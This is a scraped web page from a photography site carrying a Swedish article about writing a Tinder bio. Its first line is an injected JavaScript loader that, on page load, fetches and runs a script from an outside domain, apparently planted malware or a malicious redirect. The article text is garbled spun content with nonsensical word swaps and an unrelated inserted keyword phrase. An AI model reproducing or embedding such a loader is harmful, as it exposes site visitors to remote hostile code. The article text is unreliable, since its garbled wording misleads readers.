;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); The Makings of a Great Tinder Bio – Eydís — Ljósmyndun

The Makings of a Great Tinder Bio

The Makings of a Great Tinder Bio

Hur sa du kan inlara dig av Hootsuites 5 basta sociala videor under 2018

Tinder ar utan tvekan den mest populara sociala appen fokuserad kungen dejting. Konkurrensen ar sa gall att varje liten sak kan valja mellan ett vanster- och ett hoger-svep. Till och med nagot sa spartanskt som en valskriven biografi kan avsevart renovera dina chanser att lite en hogersvepning.

Visa oss plocka en narmare snegla pa hur de basta kvinnliga Tinder-biosen skapades och hur du kommer kungen en allena.

Spelar bio faktiskt nagon roll?

Hejsan, det forsta nagon ser nar din profil dyker upp i deras strom ar ditt profilfoto. Att ha ett valgjordt kvalitetsfoto kommer eftersom betrygga att din potentiella dejt sveper domstol. Om du svepte dem riktigt, inneha du en matchning.

Efter den forsta matchen kommer andra bilder kungen din profil och din biografi in i bilden. Under tiden en engagerande biografi i medeltal ar viktigare pro kvinnor, uppmarksammar hanar aven va som skrivs i en kvinnas biografi efter matchen.

I en procent fran fallen ar det exakt bion som avgjorde odet pro ett potentiellt par. En bio gallande din profil ger dig en chans att prata nagot mer om dig personligen och representera dig allena i basta mojliga belysning.

Gallande samma metod ger din bio dina potentiella matchningar en bra chans att ringa hur man fГҐr en tjej att gifta sig med en en titt fran vem personen bortom bilden ar. Detta ar sarskilt relevant ifall de ar kungen staketet; en vackert sammansatt bio kan latt publicera dem kontra dig. A andra sidan kan en inte bra skriven identiska garna efterfolja bort dem.

Slutligen ar Tinder ett lek som vi alla vill besta sa framgangsrika vi kan. Sa ta tag i de 500 omen som star till ditt forfogande pro att anlanda med den basta biografin du kan och maximera dina chanser for att dra at hoger.

Baksida av underben sager det ifall dig?

Du bor filosofera pa din Tinder-profil som din introduktion till en potentiell dejt. Biografin representerar de forsta orden som nagon kommer att lasa efter att de inneha sett din profilbild. Pa grund av ar det viktigt att komponera det efter din pragel och vara ditt sanna jag.

Din bio kan blottlagga sa lite som din nationalitet och alder, och det ar helt OK ifall du ar svarovertalad att skilja dina djupare tankar om Star Wars, mansklighetens framtid och livet i allmanhet. A andra sidan kan du testa addera baksida av underben du star forut, vad dina ideal ar eller hur sa du tycker ifall karlek i 500 tecken.

Detta beror minsann gallande dig, din look och preferenser. Det viktigaste har ar att din biografi ej ljuger eller representerar dig i felaktigt belysning.

Alldenstund bion ar en nodvandig post i din Tinder-strategilada, bor du reflektera ordentligt innan du lagger upp den. I de nast avsnitten kommer vi portratt att diskutera grejer att grubbla pa. Forst tar vi upp de prylar du nog vill ha med och sedan foremal du bor undfly. Visa oss dyka djupare in i skapandet av en fullgod Tinder-bio.

Don att innefatta i din bio

Forst och huvudsak, skriv nagot. Det inneha hant fler ganger an man kan rakna att ett potentiellt hogersvep nekades pa grund av en forsvunnen bio. Sanningen att prata, kvinnor ar mycket mer benagna att svepa vanster pa grund av en tom bio an man.

Eftersom du blott har 500 indikation, bor du anordna din bio fokuserad. Om du vill redogora nagot mer om dig sjalv pro andra, inbegripa enkom en handfull fran de viktigaste sakerna. Till exempel musikgenrer du lyssnar pa, favoritfilmer eller hobbyer. Du kan aven kora ett hastig citat fran din favoritfiktiva karaktar, forfattare eller filosof. Djupare och tankevackande citat kan aven fungera.

Du bor aven besta mottaglig. Du skulle bli roligt over hur flertal som sannerligen tycker att uppriktighet och sjalvfortroende ar mer vacker an utseendet. Sa om du ar en offentlig och sjalvsaker person, sang det skina igenom din bio. Vaderstreck det naturligt och hanfora de potentiella matchningarna med din djarva bio.

Kreativitet ar ett av de storsta afrodisiakum som manskligheten kanner till. Det ar saledes kreativa folk och artister inneha folk som gnaller ovanfor dem varenda de an gar. Prov att fortydliga din kreativa blad. Namn bloggen du skriver eller dina origamikunskaper. Ifall du spelar ett instrument, sag det.

Mystik ar en av de viktigaste ingredienserna i romantik. Du bor demaskera till fyllest forut att kittla deras fantasi, men inte tillrackligt for att avliva deras engagemang. Ehuru teckengransen ar 500 omen, ar din basta insats att halla sig under 250. En biografi bor vara fotografi och koncist.

Slutligen bor du fardigstalla din bio med en slags uppmaning. Du kan stalla en undran till lasarna och servera in dem att ge dig ett besked via chatten.

Grejer att undvika

Det finns aven grejer du bor avstyra och avsta fran nar du komponerar din Tinder-bio. Det forsta att kringga ar tom bio. Det gor din profil mindre attraktiv och folk kan missta dig for en havskatt.

Darnast bor din biografi inte besta fran en rad adjektiv. Undvik bios som bubblig, valvillig, pratsam, oppensinnad. Aven ifall det ar battre an inget, kan den har typen av bio inte ratt snarja eller gallande riktigt fason presentera nagons personlighet.

Dartill bor du inte trampa den fina gransen mellan att besta sjalvsaker och att besta avskyvard. Det betyder att du aldrig amna besta fornedrande och arrogant i din bio. Likaledes bor du undfly svordomar, ehuru det inte ar ett tecken gallande sjalvfortroende utan kungen ondska.

Undvik att anvanda alla tillgangliga 500 omen pro att slingra att framsta som nagon som inte vet nar den ska avga kommunicera. En bio gallande 500 ord kan ocksa signalera att agaren av profilen ar egenkar och blott bryr sig om sig personligen.

Hur man lagger upp en bio

  1. Starta Tinder-appen fran din telefon eller surfplattas startskarm.
  2. Om du ej redan ar inloggad ar det dags att skapa det genast.
  3. Nar huvudskarmen oppnas bor du publicera kungen din profilikon. Den finns langst upp pa skarmen.
  4. Klicka darefter kungen ikonerna Redigera info eller penna pro att anlanda at din profils meny.
  5. Scrolla ner till avsnittet Om.
  6. Kompression pa textrutan.
  7. Skriv din bio.
  8. Din bio kommer att uppdateras nar du stanger textrutan.

Till bio eller ej till bio

Svaret kungen denna forfragan ar stadse ”till bio.” Med en bio slipper du att misstas forut en havskatt och en svindleri. Dartill kan en valkomponerad bio forstora din hoger sveppoang med stor marginal. Den ska vara engagerande, hederligt och portratt.

Inneha du en entusiasmerande Tinder-bio, eller antaga du att du kan hoja den? Om du inneha nagra tips forut en bra Tinder-bio som vi har missat, dela dem i kommentarsfaltet nedan.

Leave a Reply

Your email address will not be published. Required fields are marked *